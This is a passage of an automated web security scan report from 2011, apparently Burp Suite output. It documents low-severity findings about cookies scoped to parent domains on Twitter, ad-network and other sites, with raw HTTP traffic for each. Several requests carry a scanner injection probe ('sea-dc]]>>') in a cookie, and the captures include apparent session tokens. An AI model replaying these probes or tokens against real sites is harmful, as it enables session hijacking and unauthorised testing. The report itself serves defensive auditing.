Cookie: NETID01=f9891e48fd6ce58119cd075cc3adf5a4; NETSEGS_K05540=e98f30f2b8e2390e&K05540&0&4e91904a&0&&4e6c320d&239be0b9fdae6d2fbd805afcd850cfc7; NETSEGS_H07707=e98f30f2b8e2390e&H07707&0&4e8312a8&4&10921,10926,11001,11087&4e5db56e&239be0b9fdae6d2fbd805afcd850cfc7; NETSEGS_J08778=e98f30f2b8e2390e&J08778&0&4e8636da&0&&4e604379&239be0b9fdae6d2fbd805afcd850cfc7; NETSEGS_I09839=e98f30f2b8e2390e&I09839&0&4e999932&0&&4e740fed&239be0b9fdae6d2fbd805afcd850cfc7; NETSEGS_F10931=e98f30f2b8e2390e&F10931&0&4e99b65c&0&&4e73f9df&239be0b9fdae6d2fbd805afcd850cfc7; udm_0=MLv39CEJZjpv597JCM1YKC+qfowJLkXm5HzcyJTaomayNeTIOt0mZGCnnxCU3g5Fl7++17leNm8ffHAB6b/mVCtcPC0+5TNgOqGlLOcs7kcw6WMqaKWl2kIvQZjEsolL0pz4vf6LEszPlgna/4OBy5/4ZkTTspiv9Msm6hzYCWbeP2g+R5/58eVFI8tRMfSjfnQLqH0/pEMmXXwmwuU8xD+kpzoEsTO7ez5HPy5K+mbh4LfHaMsWCL+XCTKWI9cdmIHl+gVPDTgc3CK8pLaz/7jrNk0pxHNOuHrk4FVkIDy9k2EMXKHSpygrcSIf7V0cXWR0V/SY2w0OzR5WIy7wVWesqdD0kNEUpdOZDrMhImy9MetxZAY/dYUYac7pgETe1YmNjk3G1SVS5XidmU7it/alnDLr7a6rBDiERDC0Lwmk0X2/WdHopasjBk9zXTQ5vymOk6PP8fTs+kGg8y9zoCfQjEhJI59YlVgsN2RbWcLxJ2ltXPcKVi6nKjKJgsfoZVrO2oHGAsWHqCrRziso12dwImO0oREKvquBMv8eypqMG2flmwPHuOnQavYplsHHbLFAK5PxjJhvGwP6B5fMyC68hk3aZMv2Ulug8AJdqWwTKCHtI0K9vgNTLcuQSLIa0T5yNdb6h1hyeG9btd9iyQMBQ4qsMf5kv67ybYgZgigDt5iY/OiCnqWhPexftsafKgOtBMBHwSMUMJQ/2tbGafyiMt6zPL3Xz5/btLPnBQG9mxDc6ZK2l9Oy3v37eFnWjY/J3ov/3q1tBXFezOPwGquiA8AUqL7LrKghR+Rvb8j/LAEShkTECSaC+LWwnz6ocbagwIqFFnAKWAEdy5DE6GhRR4elWwss77kfDtrC2Ends9TFrD/LjKNmZnicyRiU4xlFhQDgppNnnirTaZwTFK60mrg3th0XTTpTOCw+yPFKxeD4FVhNz0FcHh6yuWmKUTkbwk318gZQDfBORxTABzOBilvBEyiOCylwVOuHpFOA1pO1YY9xpWyYg6bhGYSyukJ9jxxM1x6qhi5mLBhvo8a1HTvQTZMC0o/HK+7tLhzPdDM+hTYWisTFw8/QVkhQ+wcbbEwOxhcU73M6QervSnu/q9Dq9+72SG+a2W+PLWrKgOExYBUsBOWpfyVUCb0ASJyPeTOShSVhaQ+fCBvu3XUPxGaOzpGoVD3dQkBOpy5C+1PgxsexVbXgZjAUSQQSfBssmqLcDaVpLyxs+Qopl4Kn563r+MBJgq6zq/TwkNvi/qCkpyT863ibLn3vMNFkJ//YQej4a1f1nAYsSi+KPX8m4ccideWG+VIWkdIeml4cyFsqF+rwR7f62ebxite6HhDXOQZW7V3XjcIb99328u1In9UmhJ6IOYCM3pMZvBgFi5Bq1sp7ZGCqUTRNOzygkzeI6RIYZZ0LlAJpYUQbqlROZdomQThaWYnoIHQ3MS3AA6rHcslHFCVSAuglUFRCsjlstdv++yQ96TcbUvSKhgGjcUjJD0R6kXUu8bCV; rsiPus_GIay="MLsX8FUNJi5nYDzKoFXYD5Xqgs9Mt/zQWVmaZnsSPOV+NTAxTO25Y3T/9SQCORKEN6trqtGErYp7YMOZ4gRNmft7PvpFTCRWTeAAZOovdb2Hswki2CYStlPjDtE+QTJgyxFyb3LQbz0Q/4ASjJnYEdCYgMvPNzTQDdcRktuap7MHr33Qj7kHYZlCuhGo6u4Tf8xFAHYXSwblIXtOaCNYGnJpClQH6GxSbBZ40L5aXvMtS+lg9I0Tr72kVpPYohOUANno6wrm7VqOw5LfOAQcxCnQxU7GIQiB8QGl/+NMYJwK0KX0/59Qc0x16AazPy+DXDuG7DJ8Mt9ZdknkvrOVhmT22fDw1X5IMQpC/yyvNZkofE3w6gomw+JONvXHgJQtL7O6/NVgInSpPwwmTuIjHE1FilDtHV1c0MKpgyhxEp9goNwAYQ0etDyunPKku+ck+TMoLK6df8KR1mcnSiaWsEfTZLo89iWrcnpDvP9xNmb7dO+UD3/PdRH2tiDrBDQqZTr6j9tlNjshvU7ky7luRDMgUvLlW08opyn0lUA2NaanUIqdu1KJGEvexyQ="; rsiPus_bidr="MLsX8FUNZj5nYDzKoFXYD5XqQrD3lf1+z1kmf5BdciMmNzGYQjNHLUE0d4xc0atycnxriO/0KZsoBpFupKZeMV7PfenFRPSpJ/B4XgMSWbpi1BixTbs+6iE5ayH6sfeVBDclfcs7aQzynEzZjpFO2BifjtnrlgbTChMVuJmyxZlnZJ1Jh0NtGXm/EpSJp0omr+9GZdbSF6Lzp+fuZH/aY3FZzJ206fbqaCaoBVgjZvPh4OiipROUIctrlTKObVBANgHgHKqeOZmOp3x+/GgWJgye8kOJv4yIdxSGGqloCT5ZWYHDXabtP/R4bpW0t8lOpdx4JWr2wW0zNFFSOgvZsY+PEhbY6ZnXmCpK8FO3FiEiK8ZL/uLNwqQ/DE0LGLE8BTRtrGhYXkVbBc1I8E0+yAu8ze2P7gZb34/JRe/uGeNZI0v6jCUqtq9HmUsUN8UECWWHAJRIiM/NMGD77IG0rlwlEqETOz1Hg8WWQkD6xwHNXK1A43tBQ9JN9Egnh8Iblexu8i5FN3aBwUvFNQk730pyK5mClxbvL+KXSj44prIJw5K9W5RLXhCBHw=="; rsi_us_1000000="pUMd4z9HMAYYbm+istsgxv7+mvc+cC1B+3tY0F6r9vSLrFABPuZI6YchRbl7qd+XW2hVt/QdtrdYgNuGDVCDBRsQZctaVDqAIKiiRkGNdVfKQRM8nhjDEuJXKWPfICrLmmSRp8Mhr3ShN+eWDTnY3HJ8+VSks4XYl3avQ7Hur+r93FheUrahkUxj6ZmGZWu4dW0XBls+YrSPa+PUrAoGk1EXk81+r5BmpkCnF3yUB4TdaxjvEgFIkI/4md4hO6+dVtvUaguMpm5t+BOzorDKXqL2mGfZWjiRB/BUL10dY8QU9delsnaA3ueClTU5rQ4gMPiWxhe3k1XhHzPNuscshJdH6ut4yPA4WJvwOI0FK0U/Ny+uqFpb9WT71MQft1hknAOluSAtoVkbH9omakq+YUBLESH+2BIyUDaV4dvKJk/YmZAHcIxIbYxWZjzBS/tDDbPZDcxmiFTy7dHLj8ZQerR0v/iA/voS7SMUk2d/8fo4Uh1leIJQ+BMCZ7P1s6XLdi6X34IthsAbqidjXvWiaeSZCzLwayDDZ+WPkUaoOMWNXg2XhAtw5Kaz05to0ltFxB7FbsprP9GNc21uwNlcJK2yrt4PyiAUjRmsmn3vLo9xoADhkKtsFbCuihMj6/zbB19MExHT2BDrGqHz/rVvCWtFZmYI3+0TW8mOvFwqUtWd+Ylp0Rn4ZuPHupXFIxs49jNd2zPy+IVXKacgjpIj/K/X1IaRp+PaNRydlkyFh+SH3S/dxCBtVRtQNRXLQOOZ3SJsVqFH4wBa6pvVJ9O9oY7hiTz6dXOV0Nzf351eYHRVBy2/94rZxtGWauVgEmSWUp/fUk5/qw/Os28Kj0jvGbSL6y3Nakem+bRQy/F/a5Ukwdimx9QiY3rpIWLyMmptlSDMNxilrJvtellnbqHxJ2bVgbQGO6I2AvNjtKl4oyoIK3seOfPUtNZ3vwPyTFdA2MVJ3RB7L5DkRjAcv6RuOt8Eh5+jCwwnWcutVahdAzXkSyeu0e6zhp7BEXirYP9AgHOFqTdtU3L3UqnLDhaFzIwBsoaizXfbkdpf8y1GR0RaFtqp/IThvUXEPBxd0eZAz+V7oc9eMe0kvWilgxd0yqa8p1yB5xmxgebe9ZoXt8Hhp/CMtOxhICS7seBpKJ0Slh6tXNhg6RSXqYRbt7aS88qtdBRC9eKqnQ=="; rsi_segs_1000000=pUPFJk+B73IM1p94u+w/VXTPWv/4lqXpA6GHJmbgusJbus3Mx+p24I1oDZUZb5s27P+ai79l7ni6EqU0UjR/LajAVpfU/0/yivwWy7CCuk/LdbJkwc/2D3eg8kPC99AbBTxElA1fdUST18Pst5/sOuODR6gvBT50j9ah/ZKEkRLqz+rBietPxjUalq+Y1WWc2iBa8iLTlsKi0FbdV7pJ4k+HRzFBUr8Lfl4uOyVSHF1S51gps6VKZfxsQrxH5Z86gMsRlBeV6VKhF1jTGOkscvri6srHhhKcBMJOCCs+Ip+MEelaaYPgGsmz9cHJzB8ftFrmg/JwxNmjwluFdrKubkbynWjrrySZH9UTZSMz; NETSEGS_K08784=e98f30f2b8e2390e&K08784&0&4e99b6b4&0&&4e73fec3&239be0b9fdae6d2fbd805afcd850cfc7; rtc_ZVG6=MLvv9aMOYT5n5fgbA5zKZLneWRTAxbuxebXlxUcjzcXGSuZyPt6fFu3OMJQ9F3Bxzw8u0eGHRiclcyshyEZ1qHhG2V8spU6IKrZCkCNniKtWmluF6ggxz6ZKxwokHVbftCFbJGN72TfsNURrZAk2e/h/zok1/7Q8idLTjDR+5Sk2AB2y7X9Qvk+B1fiKnyrl4C6f7/hOPjrPVDaZ13CaSq2iUKTWvwqgILldJdo9tSxC4qdf1k8dk2ORHN7T3cnvcgo84QMYEeiYQYSD4lN4akmSTZWpOBOugeYG4CvGobmA/MZeHJxUyzUtrr9eVJGwStW4VDmUZQ1a5wqbg4F1ESMPvOjRUpJhowa6YGxLHpt79nIBj7cWDZauHEVNg3QfMOPFtBxdCcShmVlL3IjAmRwE9cfwfzHt9m3QWJmPkKoYFi+pAGIp0gYkheZGssNc9IbT/1LdfwJlijkYGYsG7RqGyN0afnD/cpHF58tM7xwNGIYH3b8KHdhadk72ovy13lJzV7JclcE61i6MgVaPbMz+FPtQT46ikQ2eEVQHnDVaRtm/qJAfsVjdWyiY6Js8fhIUbGLbaDA2hclaajEIMuQ3WRSL5cLW6NuEVTTpIv3u/65jY3rStpVD4qSM7550SPYXV3piHZb/gfYkKZ/zCOmyYbBsVXSkBU/ABGHd/GljMSOyc2muRhrqXVEsZAWXww5JbD67UOseMoVq/Glde1NTaNyFbfF3T7Nuvkerww==

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Location: http://a7eb4270056fd51b9/a?http://www.networkadvertising.org/verify/cookie_optout.gif
Content-Length: 0
Date: Sat, 17 Sep 2011 17:08:57 GMT

12. Cookie scoped to parent domain  previous  next
There are 159 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

12.1. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1/statuses/user_timeline.json?screen_name=donatemydress&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=4&since_id=108937040900521984&refresh=true&clientsource=TWITTERINC_WIDGET&1316294807080=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.donatemydress.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __utma=43838368.1721518288.1314976448.1315460719.1315936872.4; __utmz=43838368.1315936872.4.4.utmcsr=burlingtonfreepress.com|utmccn=(referral)|utmcmd=referral|utmcct=/apps/pbcs.dll/article; k=50.23.123.106.1316084567946622; original_referer=ZLhHHTiegr%2BCdn6sXdQJWUmDjkiRQJlv0w2g35v18j4%3D; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJWRmNzNjOTVlMzdkNzA1MzA5NWQxNGM0%250AZTVlODIxYThmOg9jcmVhdGVkX2F0bCsIYpI0eDIB--5023b45acba9e3b63ba715734f7413258dff672e

Response

HTTP/1.1 400 Bad Request
Date: Sat, 17 Sep 2011 16:41:03 GMT
Server: hi
Status: 400 Bad Request
X-RateLimit-Limit: 150
X-RateLimit-Remaining: 0
X-Runtime: 0.00799
Content-Type: application/json; charset=utf-8
X-RateLimit-Class: api
Cache-Control: no-cache, max-age=300
X-RateLimit-Reset: 1316280303
Set-Cookie: guest_id=v1%3A131627766338056659; domain=.twitter.com; path=/; expires=Tue, 17 Sep 2013 04:41:03 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCPqIQXgyAToHaWQiJTY5NTkxNjc4ZjZkNDA1%250AZDM0ZjVhYTRlZjE2ZGVjYWUyIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--61914355fa092810f2dad4d5f9ceefa29e06a23a; domain=.twitter.com; path=/; HttpOnly
Expires: Sat, 17 Sep 2011 16:46:03 GMT
Vary: Accept-Encoding
Content-Length: 349
Connection: close

TWTR.Widget.receiveCallback_1({"error":"Rate limit exceeded. Clients may not make more than 150 requests per hour.","request":"\/1\/statuses\/user_timeline.json?screen_name=donatemydress&callback=TWTR
...[SNIP]...
12.2. http://optout.mookie1.com/optout/nai/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://optout.mookie1.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout&nocache=0.2690409 HTTP/1.1
Host: optout.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: id=2040695539456590; OAX=Mhd7ak45SYsADCcs; RMFL=011QqFEqU103Xq|U103zF; NXCLICK2=011QqFEuNX_Nonsecure!y!B3!3Xq!4qrNX_TRACK_Atandtwireless/Homepage_NX_Nonsecure!y!B3!3zF!5IxNX_TRACK_Atandtwireless/RTB_Retargeting_NX_Nonsecure!y!B3!gA!14l; mdata=1|2040695539456590|1313431890; NSC_pqupvu_qppm_iuuq=ffffffff0941323f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:19:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: id=deleted; expires=Fri, 17-Sep-2010 17:19:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: name=deleted; expires=Fri, 17-Sep-2010 17:19:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: id=deleted; expires=Fri, 17-Sep-2010 17:19:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: session=deleted; expires=Fri, 17-Sep-2010 17:19:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: mdata=deleted; expires=Fri, 17-Sep-2010 17:19:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: OAX=deleted; expires=Fri, 17-Sep-2010 17:19:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: %2emookie1%2ecom/%2f/1/o=0/cookie; expires=Fri, 13-Sep-2024 17:19:14 GMT; path=/; domain=.mookie1.com
Set-Cookie: optouts=cookies; expires=Fri, 13-Sep-2024 17:19:14 GMT; path=/; domain=.mookie1.com
Set-Cookie: RMOPTOUT=3; expires=Fri, 13-Sep-2024 17:19:14 GMT; path=/; domain=.mookie1.com
Location: /optout/nai/index.php?action=optout&nocache=0.2690409&check_cookie=true
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

12.3. http://www.gather.com/URI%20SYNTAX%20EXCEPTION  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.gather.com
Path:   /URI%20SYNTAX%20EXCEPTION

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /URI%20SYNTAX%20EXCEPTION HTTP/1.1
Host: www.gather.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: gathersid=www06; ref=direct_www; __utma=185998783.1950058045.1316295781.1316295781.1316295781.1; __utmb=185998783.1.10.1316295781; __utmc=185998783; __utmz=185998783.1316295781.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 17 Sep 2011 16:42:04 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=642B4580EDE3E511BE324FC3053BDCDC; Domain=.gather.com; Path=/
Location: http://www.gather.com/URI+SYNTAX+EXCEPTION
Content-Length: 0
Content-Type: text/html;charset=UTF-8

12.4. http://a.collective-media.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:41:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
Content-Length: 93

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>
12.5. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/bzo.454.61DCBAA1/_default

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/bzo.454.61DCBAA1/_default;sz=300x250;ord=1316294716649? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 435
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:24:04 GMT
Connection: close
Set-Cookie: dc=sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:24:04 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" lang
...[SNIP]...
12.6. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/be_home

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/q1.q.seattlepostintelligencer/be_home;sz=728x90;ord=55136920? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 440
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:29:33 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:29:33 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" lang
...[SNIP]...
12.7. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/home

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/q1.q.seattlepostintelligencer/home;sz=300x250;ord=2513202086? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 440
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:29:45 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:29:45 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" lang
...[SNIP]...
12.8. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/qo

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/q1.q.seattlepostintelligencer/qo;sz=300x250;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 439
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:23:39 GMT
Connection: close
Set-Cookie: dc=sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:23:39 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" lang
...[SNIP]...
12.9. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.454.61DCBAA1/_default

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/bzo.454.61DCBAA1/_default;sz=300x250;net=bzo;ord=1316294716649;ord1=205270;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7298
Date: Sat, 17 Sep 2011 16:24:05 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
12.10. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/be_home

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/q1.q.seattlepostintelligencer/be_home;sz=728x90;net=q1;ord=55136920;ord1=477754;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
